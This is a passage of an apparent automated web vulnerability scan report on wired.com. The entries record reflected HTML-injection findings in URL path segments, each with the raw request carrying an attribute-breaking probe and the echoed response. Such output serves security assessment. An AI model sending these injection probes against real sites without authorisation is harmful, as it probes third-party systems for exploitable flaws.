This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencef7763"><a>37b818daaa2/discoveries/news/2008/05/dayintech_0508 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:23 GMT
Date: Sun, 21 Nov 2010 23:11:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencef7763"><a>37b818daaa2 ss_discoveries c_news">
...[SNIP]...

1.708. http://www.wired.com/science/discoveries/news/2008/05/dayintech_0508 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/05/dayintech_0508

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1784"><a>144b05b950e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesa1784"><a>144b05b950e/news/2008/05/dayintech_0508 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:38 GMT
Date: Sun, 21 Nov 2010 23:11:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesa1784"><a>144b05b950e c_news">
...[SNIP]...

1.709. http://www.wired.com/science/discoveries/news/2008/05/dayintech_0508 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/05/dayintech_0508

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a08c"><a>d3d8da4d6ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news4a08c"><a>d3d8da4d6ca/2008/05/dayintech_0508 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:50 GMT
Date: Sun, 21 Nov 2010 23:11:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news4a08c"><a>d3d8da4d6ca">
...[SNIP]...

1.710. http://www.wired.com/science/discoveries/news/2008/05/dayintech_0529 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/05/dayintech_0529

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aac1f"><a>5403a7340a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /scienceaac1f"><a>5403a7340a/discoveries/news/2008/05/dayintech_0529 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:26 GMT
Date: Sun, 21 Nov 2010 23:11:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_scienceaac1f"><a>5403a7340a ss_discoveries c_news">
...[SNIP]...

1.711. http://www.wired.com/science/discoveries/news/2008/05/dayintech_0529 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/05/dayintech_0529

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d1a4"><a>42968683ca3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries9d1a4"><a>42968683ca3/news/2008/05/dayintech_0529 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:41 GMT
Date: Sun, 21 Nov 2010 23:11:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries9d1a4"><a>42968683ca3 c_news">
...[SNIP]...

1.712. http://www.wired.com/science/discoveries/news/2008/05/dayintech_0529 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/05/dayintech_0529

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10b14"><a>883fb4baad9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news10b14"><a>883fb4baad9/2008/05/dayintech_0529 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:53 GMT
Date: Sun, 21 Nov 2010 23:11:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news10b14"><a>883fb4baad9">
...[SNIP]...

1.713. http://www.wired.com/science/discoveries/news/2008/07/dayintech_0703 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/07/dayintech_0703

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4df74"><a>5147fa5c783 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science4df74"><a>5147fa5c783/discoveries/news/2008/07/dayintech_0703 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:55 GMT
Date: Sun, 21 Nov 2010 23:11:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science4df74"><a>5147fa5c783 ss_discoveries c_news">
...[SNIP]...

1.714. http://www.wired.com/science/discoveries/news/2008/07/dayintech_0703 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/07/dayintech_0703

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3b3d"><a>3ce8d2bac62 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesb3b3d"><a>3ce8d2bac62/news/2008/07/dayintech_0703 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:12 GMT
Date: Sun, 21 Nov 2010 23:12:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesb3b3d"><a>3ce8d2bac62 c_news">
...[SNIP]...

1.715. http://www.wired.com/science/discoveries/news/2008/07/dayintech_0703 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/07/dayintech_0703

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56075"><a>6061ca3c823 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news56075"><a>6061ca3c823/2008/07/dayintech_0703 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:25 GMT
Date: Sun, 21 Nov 2010 23:12:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news56075"><a>6061ca3c823">
...[SNIP]...

1.716. http://www.wired.com/science/discoveries/news/2008/07/dayintech_0709 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/07/dayintech_0709

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3db02"><a>f874204744b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science3db02"><a>f874204744b/discoveries/news/2008/07/dayintech_0709 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:03 GMT
Date: Sun, 21 Nov 2010 23:12:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science3db02"><a>f874204744b ss_discoveries c_news">
...[SNIP]...

1.717. http://www.wired.com/science/discoveries/news/2008/07/dayintech_0709 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/07/dayintech_0709

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9fd1"><a>86c7e4de0c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesd9fd1"><a>86c7e4de0c/news/2008/07/dayintech_0709 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:20 GMT
Date: Sun, 21 Nov 2010 23:12:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesd9fd1"><a>86c7e4de0c c_news">
...[SNIP]...

1.718. http://www.wired.com/science/discoveries/news/2008/07/dayintech_0709 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/07/dayintech_0709

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6b98"><a>dbfd5c107d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/newsb6b98"><a>dbfd5c107d/2008/07/dayintech_0709 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:33 GMT
Date: Sun, 21 Nov 2010 23:12:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newsb6b98"><a>dbfd5c107d">
...[SNIP]...

1.719. http://www.wired.com/science/discoveries/news/2008/08/dayintech_0812 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/08/dayintech_0812

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff39c"><a>59bffd6a4f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /scienceff39c"><a>59bffd6a4f8/discoveries/news/2008/08/dayintech_0812 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:03 GMT
Date: Sun, 21 Nov 2010 23:12:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_scienceff39c"><a>59bffd6a4f8 ss_discoveries c_news">
...[SNIP]...

1.720. http://www.wired.com/science/discoveries/news/2008/08/dayintech_0812 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/08/dayintech_0812

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 644ae"><a>6b5c8b0db9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries644ae"><a>6b5c8b0db9b/news/2008/08/dayintech_0812 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:19 GMT
Date: Sun, 21 Nov 2010 23:12:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries644ae"><a>6b5c8b0db9b c_news">
...[SNIP]...

1.721. http://www.wired.com/science/discoveries/news/2008/08/dayintech_0812 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/08/dayintech_0812

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce779"><a>d1da1c60cd6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/newsce779"><a>d1da1c60cd6/2008/08/dayintech_0812 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:30 GMT
Date: Sun, 21 Nov 2010 23:12:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newsce779"><a>d1da1c60cd6">
...[SNIP]...

1.722. http://www.wired.com/science/discoveries/news/2008/08/dayintech_0814 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/08/dayintech_0814

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7b19"><a>3c1f34f3de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /scienceb7b19"><a>3c1f34f3de/discoveries/news/2008/08/dayintech_0814 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
